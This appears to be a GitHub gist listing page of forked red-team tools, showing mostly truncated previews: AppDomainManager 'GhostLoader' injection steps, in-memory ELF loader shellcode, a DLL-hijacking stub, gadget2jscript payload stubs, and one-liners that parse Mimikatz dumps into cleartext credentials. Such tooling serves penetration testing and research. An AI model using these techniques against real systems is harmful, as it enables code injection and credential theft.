GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
David kafkaesqu3
kafkaesqu3
/ pfx2john.py
Created
July 19, 2023 19:39
— forked from tijme/pfx2john.py
Python3 version of `pfx2john.py` from John the Ripper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding: utf-8 | |
| """ | |
| Modified for JtR by Dhiru Kholia in July, 2016 | |
| Copyright (c) 2015 Will Bond <[email protected]> | |
| Permission is hereby granted, free of charge, to any person obtaining a copy of | |
| this software and associated documentation files (the "Software"), to deal in |
kafkaesqu3
/ mem-loader.asm
Created
September 15, 2021 16:54
— forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
| ;;; | |
| ;;; Copyright (C), zznop, [email protected] | |
| ;;; | |
| ;;; This software may be modified and distributed under the terms | |
| ;;; of the MIT license. See the LICENSE file for details. | |
| ;;; | |
| ;;; DESCRIPTION | |
| ;;; | |
| ;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF |
kafkaesqu3
/ drvscan.cpp
Created
May 6, 2021 00:00
— forked from adrianyy/drvscan.cpp
vulnerable driver scanner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string> | |
| #include <vector> | |
| #include <fstream> | |
| #include <iostream> | |
| #include <filesystem> | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| static_assert( sizeof( void* ) == 8 ); |
kafkaesqu3
/ ntlmdecoder.py
Created
March 3, 2021 17:28
— forked from aseering/ntlmdecoder.py
NTLM auth-string decoder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
| ## Reads the raw blob from stdin; prints out the contained metadata. | |
| ## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
| ## Based on the excellent protocol description from: | |
| ## <http://davenport.sourceforge.net/ntlm.html> | |
| ## with additional detail subsequently added from the official protocol spec: | |
| ## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
| ## |
kafkaesqu3
/ main.cpp
Created
December 18, 2020 16:00
— forked from monoxgas/main.cpp
Adapative DLL Hijacking - Stability Hooking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| DWORD WINAPI Thread(LPVOID lpParam) { | |
| // Insert evil stuff | |
| ExitProcess(0); |
kafkaesqu3
/ gadget2jscriptQueueAPCInject.cs
Created
May 29, 2020 18:28
— forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using System.Net; | |
| using System.IO.Compression; | |
| public class Payload | |
| { |
kafkaesqu3
/ blockdlls_gadget2jscript.cs
Created
May 1, 2020 13:31
— forked from rvrsh3ll/blockdlls_gadget2jscript.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.IO.Compression; | |
| using System.Runtime.InteropServices; | |
| public class Payload | |
| { | |
| public Payload() |
kafkaesqu3
/ _Instructions_Reproduce.md
Created
April 30, 2020 01:06
GhostLoader - AppDomainManager - Injection - 攻壳机动队
kafkaesqu3
/ One-liner Mimikatz Parser
Created
July 16, 2019 14:32
— forked from Raikia/One-liner Mimikatz Parser
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password" | |
| First, before using these parsers, run: "dos2unix mimikatz_dump.txt" | |
| Mimikatz 1.0: | |
| cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u | |
| Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
NewerOlder